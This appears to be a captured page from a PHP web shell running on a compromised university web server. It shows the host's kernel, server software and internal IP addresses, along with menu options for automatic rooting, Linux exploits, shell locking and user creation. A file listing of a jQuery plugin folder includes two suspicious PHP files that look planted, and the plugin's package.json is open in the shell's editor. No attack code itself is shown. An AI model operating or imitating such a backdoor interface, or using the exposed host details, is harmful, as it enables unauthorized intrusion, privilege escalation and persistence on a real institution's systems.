Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
html3 /
animsition-master /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxrwxr-x
sandbox
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.editorconfig
207
B
-rwxrwxr-x
.gitignore
16
B
-rwxrwxr-x
.travis.yml
109
B
-rwxrwxr-x
bower.json
374
B
-rwxrwxr-x
CHANGELOG.md
1.14
KB
-rwxrwxr-x
gulpfile.js
2.29
KB
-rwxrwxr-x
LICENSE.md
1.05
KB
-rwxrwxr-x
package.json
997
B
-rwxrwxr-x
README.md
2.09
KB
-rwxrwxr-x
urdvcihg.php
760
B
-rwxrwxr-x
worksec.php
1.02
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "animsition", "version": "4.0.2", "description": "A simple and easy jQuery plugin for CSS animated page transitions.", "keywords": [ "css3", "js", "animation", "page transition", "jQuery" ], "main":"./dist/js/animsition.js", "author": { "name": "blivesta", "email": "design@blivesta.com", "url": "http://blivesta.com/" }, "homepage": "http://blivesta.github.io/animsition", "license": "MIT", "repository": { "url": "https://github.com/blivesta/animsition.git", "type": "git" }, "scripts":{ "setup": "npm i && gulp build" }, "devDependencies": { "browser-sync": "^2.9.12", "autoprefixer":"^6.0.3", "del":"^1.2.0", "gulp":"^3.9.0", "gulp-cssnano":"^2.0.0", "gulp-header":"^1.7.1", "gulp-jshint":"^1.11.2", "gulp-postcss":"^6.0.0", "gulp-rename":"^1.2.2", "gulp-uglify":"^1.2.0", "jshint-stylish":"^2.0.1", "postcss-import":"^7.0.0", "run-sequence":"^1.1.2" } }
Close